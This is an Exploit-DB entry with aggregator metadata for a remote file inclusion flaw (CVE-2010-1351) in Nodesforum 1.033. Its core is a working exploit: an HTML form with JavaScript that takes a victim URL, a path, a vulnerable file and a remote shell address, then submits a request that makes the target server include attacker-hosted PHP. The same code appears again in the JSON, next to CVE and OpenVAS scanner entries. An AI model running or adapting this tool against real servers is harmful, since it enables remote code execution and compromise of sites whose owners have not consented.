ID EDB-ID:12047Type exploitdbReporter ITSecTeamModified 2010-04-04T00:00:00
Description
nodesforum v1.033 Remote File Inclusion Vulnerability. CVE-2010-1351. Webapps exploit for php platform
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
<title>coded by ahmadbady</title>
<script language="JavaScript">
//===========================================================================
//( #Topic : nodesforum_1.033
//( #Bug type : multi remote file include
//( #Advisory :
//===========================================================================
//( #Author : ItSecTeam
//( #Email : Bug@ITSecTeam.com
//( #Website: http://www.itsecteam.com
//( #Forum : http://forum.ITSecTeam.com
//vuls---------------------------------------------------------------------
//erase_user_data.php line 6;
//pre_output.php line 16 ;
//--------------------------------------------------------------------------
var variable1 ="?_nodesforum_path_from_here_to_nodesforum_folder="
var variable2 ="?_nodesforum_code_path="
function it(){
if (xpl.file.value=="pre_output.php"){
variable1 = variable2;
}
xpl.action= xpl.victim.value+xpl.path.value+xpl.file.value+variable1+xpl.shell.value;xpl.submit();
}
</script>
</head>
<body bgcolor="#FFFFFF">
<p align="left"><font color="#FF0000">vul1 file:/path/erase_user_data.php</font></p>
<p align="left"><font color="#FF0000">vul2 file:/path/pre_output.php</font></p>
<p align="left"><font color="#0000FF">-----------------------------------</font></p>
<form method="post" name="xpl" onSubmit="it();">
<p align="left">
<font
size="2" face="Tahoma">
victim:
<input type="text" name="victim" size="20";" style="color: #FFFFFF; background-color: #000000">
path:
<input type="text" name="path" size="20";" style="color: #FFFFFF; background-color: #000000">
file:
<input type="text" name="file" size="20";" style="color: #FFFFFF; background-color: #000000">
shell address:
<input type="text" name="shell" size="20";" style="color: #FFFFFF; background-color: #000000"></p>
</p>
<center>
</p>
<p><input type="submit" value="GO" name="B1" style="float: left"><input type="reset"
value="reset" name="B2" style="float: left"></p>
</form>
<p><br>
 </p>
</center>
</body>
</html>
{"hash": "87d3a1b7b4f09df269dd88572c190169543a95a3e28e172251c71bffcba0ace2", "id": "EDB-ID:12047", "lastseen": "2016-02-01T15:35:13", "enchantments": {"vulnersScore": 5.0}, "bulletinFamily": "exploit", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "edition": 1, "history": [], "type": "exploitdb", "sourceHref": "https://www.exploit-db.com/download/12047/", "description": "nodesforum v1.033 Remote File Inclusion Vulnerability. CVE-2010-1351. Webapps exploit for php platform", "title": "nodesforum 1.033 - Remote File Inclusion Vulnerability", "sourceData": "<html>\r\n<head>\r\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-1254\">\r\n<title>coded by ahmadbady</title>\r\n\r\n<script language=\"JavaScript\">\r\n\r\n//===========================================================================\r\n//( #Topic : nodesforum_1.033\r\n//( #Bug type : multi remote file include\r\n//( #Advisory : \r\n//===========================================================================\r\n//( #Author : ItSecTeam\r\n//( #Email : Bug@ITSecTeam.com\r\n//( #Website: http://www.itsecteam.com\r\n//( #Forum : http://forum.ITSecTeam.com\r\n//vuls---------------------------------------------------------------------\r\n//erase_user_data.php line 6;\r\n//pre_output.php line 16 ;\r\n//--------------------------------------------------------------------------\r\n\r\nvar variable1 =\"?_nodesforum_path_from_here_to_nodesforum_folder=\"\r\nvar variable2 =\"?_nodesforum_code_path=\"\r\n \r\n function it(){\r\n if (xpl.file.value==\"pre_output.php\"){\r\n variable1 = variable2;\r\n \r\n }\r\n xpl.action= xpl.victim.value+xpl.path.value+xpl.file.value+variable1+xpl.shell.value;xpl.submit(); \r\n }\r\n</script>\r\n\r\n</head>\r\n\r\n<body bgcolor=\"#FFFFFF\">\r\n\r\n<p align=\"left\"><font color=\"#FF0000\">vul1 file:/path/erase_user_data.php</font></p>\r\n<p align=\"left\"><font color=\"#FF0000\">vul2 file:/path/pre_output.php</font></p>\r\n<p align=\"left\"><font color=\"#0000FF\">-----------------------------------</font></p>\r\n<form method=\"post\" name=\"xpl\" onSubmit=\"it();\">\r\n <p align=\"left\">\r\n <font \r\nsize=\"2\" face=\"Tahoma\">\r\n \tvictim:\r\n \t<input type=\"text\" name=\"victim\" size=\"20\";\" style=\"color: #FFFFFF; background-color: #000000\"> \r\n\tpath:\r\n\t<input type=\"text\" name=\"path\" size=\"20\";\" style=\"color: #FFFFFF; background-color: #000000\"> \r\n\tfile:\r\n\t<input type=\"text\" name=\"file\" size=\"20\";\" style=\"color: #FFFFFF; background-color: #000000\"> \r\n\tshell address:\r\n\t<input type=\"text\" name=\"shell\" size=\"20\";\" style=\"color: #FFFFFF; background-color: #000000\"></p>\r\n \t</p>\r\n<center>\r\n\r\n</p>\r\n <p><input type=\"submit\" value=\"GO\" name=\"B1\" style=\"float: left\"><input type=\"reset\" \r\nvalue=\"reset\" name=\"B2\" style=\"float: left\"></p>\r\n</form>\r\n<p><br>\r\n\u00c2\u00a0</p>\r\n</center>\r\n</body>\r\n\r\n</html>", "objectVersion": "1.0", "cvelist": ["CVE-2010-1351"], "published": "2010-04-04T00:00:00", "osvdbidlist": ["63555", "63554"], "references": [], "reporter": "ITSecTeam", "modified": "2010-04-04T00:00:00", "href": "https://www.exploit-db.com/exploits/12047/"}
{"result": {"cve": [{"id": "CVE-2010-1351", "type": "cve", "title": "CVE-2010-1351", "description": "Multiple PHP remote file inclusion vulnerabilities in Nodesforum 1.033 and 1.045, when register_globals is enabled, allow remote attackers to execute arbitrary PHP code via a URL in the (1) _nodesforum_path_from_here_to_nodesforum_folder parameter to erase_user_data.php and the (2) _nodesforum_code_path parameter to pre_output.php. NOTE: some of these details are obtained from third party information.", "published": "2010-04-12T14:30:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-1351", "cvelist": ["CVE-2010-1351"], "lastseen": "2017-08-17T11:14:46"}], "openvas": [{"id": "OPENVAS:1361412562310902040", "type": "openvas", "title": "Nodesforum Multiple Remote File Inclusion Vulnerabilities", "description": "This host is running Nodesforum and is prone to multiple remote file\n inclusion vulnerabilities.", "published": "2010-04-16T00:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902040", "cvelist": ["CVE-2010-1351"], "lastseen": "2017-10-30T10:45:01"}]}}
